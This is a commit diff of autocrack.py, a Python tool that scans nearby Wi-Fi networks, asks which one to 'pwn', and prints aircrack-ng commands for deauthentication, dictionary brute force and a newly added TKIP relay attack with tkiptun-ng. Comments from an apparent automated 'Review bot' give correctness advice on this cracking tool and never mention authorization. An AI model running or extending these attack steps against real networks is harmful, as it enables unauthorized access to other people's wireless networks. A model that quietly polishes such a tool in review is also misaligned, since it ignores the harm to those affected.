authorJason A. Donenfeld <Jason@zx2c4.com>2013-10-09 15:04:48 +0200
committerJason A. Donenfeld <Jason@zx2c4.com>2013-10-09 15:04:48 +0200
commitfbd596046beb9758b6d32f95c64c4ec17222ff58 (patch)
treee006d62a155a760582988d331db909fb75875963
parentFix ordering. (diff)
Various tweaks and initial incomplete support for tkip attack.
-rwxr-xr-xautocrack.py89
1 files changed, 56 insertions, 33 deletions
diff --git a/autocrack.py b/autocrack.py
index 253a64e..dd80de3 100755
--- a/autocrack.py
+++ b/autocrack.py
@@ -140,6 +140,22 @@ aireplay-ng -0 1 -a BSSID -c CLIENT INTERFACE
== Brute Force ==
cat /usr/share/dict/* | aircrack-ng -w - -b BSSID psk*.cap
"""
+ if "(TKIP)" in network["Encryption"]:
+ instructions += """
+
+---------
+
+Instead of brute forcing it, because this AP supports TKIP, there are possibilities of RC4 vulnerabilities.
+
+=== Capture IVs ==
+airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE
+
+=== TKIP Relay ===
+tkiptun-ng -h MAC -a BSSID -m 80 -n 100 INTERFACE
+
+== Analyze ==
+aircrack-ng -z -b BSSID output*.cap
+"""
else:
instructions = "Wrong encryption type"
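Review bot: The `"(TKIP)" in network["Encryption"]` test depends on the display suffix that get_encryption appends in a later hunk of this commit, so a formatting change there would silently disable this branch. The enclosing if/elif chain starts outside the hunk; if it compares `network["Encryption"]` by equality, a value such as "WPA (TKIP)" would fall through to "Wrong encryption type", which is worth confirming. Carrying the cipher in its own field (for example a boolean `network["TKIP"]`) and leaving "Encryption" as the bare type would avoid both problems. The new headings are also unbalanced (`=== Capture IVs ==`, `=== TKIP Relay ===`, `== Analyze ==`) next to the existing `== Brute Force ==` style.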
@@ -165,7 +181,10 @@ def get_encryption(cell):
if matching_line(cell, "Encryption key:") == "off":
enc = "Open"
else:
+ tkip = False
for line in cell:
+ if "Pairwise Ciphers (1) : TKIP" in line:
+ tkip = True
matching = match(line, "IE:")
if matching != None:
wpa = match(matching, "WPA")
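Review bot: The substring `"Pairwise Ciphers (1) : TKIP"` is tied to the exact count and spacing of one iwlist output form, so it flags only cells whose single pairwise cipher is TKIP, while the text added in the first hunk says the AP "supports TKIP". If that is the intent, state it next to the check, e.g. `# only matches cells advertising TKIP as the sole pairwise cipher`; otherwise parse the cipher list after the colon instead of matching a fixed string. `tkip` is also assigned only inside this `else:` branch, and the function body continues outside the hunk, so the later `if tkip:` must stay inside the same branch or the "Open" path would raise NameError. The indentation is not recoverable from this page, so that needs checking in the file.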
@@ -177,6 +196,8 @@ def get_encryption(cell):
enc = "WPA2"
if enc == "":
enc = "WEP"
+ if tkip:
+ enc += " (TKIP)"
return enc
def get_address(cell):
@@ -261,40 +282,42 @@ def main():
if os.getuid() != 0:
print "You must be root."
return
-
- print "[+] Scanning..."
- proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE)
- cells=[[]]
- parsed_cells=[]
- for line in proc.stdout:
- cell_line = match(line, "Cell ")
- if cell_line != None:
- cells.append([])
- line = cell_line[-27:]
- cells[-1].append(line.rstrip())
- cells = cells[1:]
- for cell in cells:
- parsed_cells.append(parse_cell(cell))
- sort_cells(parsed_cells)
- encrypted_cells = []
- for cell in parsed_cells:
- if cell["Encryption"] != "Open":
- encrypted_cells.append(cell)
-
- if len(encrypted_cells) == 0:
- print "[-] Could not find any wireless networks. Goodbye."
- return
-
- print_cells(encrypted_cells)
- print
- try:
- network = int(raw_input("Which network would you like to pwn? [1-%s] " % len(encrypted_cells)))
- except:
- network = -1
+ while True:
+ print "[+] Scanning..."
+ proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE)
+ cells=[[]]
+ parsed_cells=[]
+ for line in proc.stdout:
+ cell_line = match(line, "Cell ")
+ if cell_line != None:
+ cells.append([])
+ line = cell_line[-27:]
+ cells[-1].append(line.rstrip())
+ cells = cells[1:]
+ for cell in cells:
+ parsed_cells.append(parse_cell(cell))
+ sort_cells(parsed_cells)
+ encrypted_cells = []
+ for cell in parsed_cells:
+ if cell["Encryption"] != "Open":
+ encrypted_cells.append(cell)
- if network > len(encrypted_cells) or network < 1:
+ if len(encrypted_cells) == 0:
+ print "[-] Could not find any wireless networks."
+ time.sleep(2)
+ continue
+
+ print_cells(encrypted_cells)
+ print
+ try:
+ network = int(raw_input("Which network would you like to pwn? [1-%s] [0 to rescan, -1 to quit] " % len(encrypted_cells)))
+ except:
+ network = -1
+ if network > len(encrypted_cells) or network < 0:
+ return
+ if network == 0:
+ continue
+ pwn(sys.argv[1], encrypted_cells[network - 1])
return
- pwn(sys.argv[1], encrypted_cells[network - 1])
-
main()
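Review bot: The empty-result branch now sleeps and rescans forever, and the exit status of `iwlist` is never checked, so a wrong interface name or a failing scan loops silently with no way out except interrupting the process. Reaping the child after the read loop and stopping on failure would bound this, e.g. `if proc.wait() != 0: return`. The new `time.sleep(2)` needs `import time`, which this diff does not add, so confirm the module is already imported at the top of the file. The bare `except:` around `raw_input` also catches KeyboardInterrupt; `except ValueError:` would limit it to the bad-number case the prompt describes.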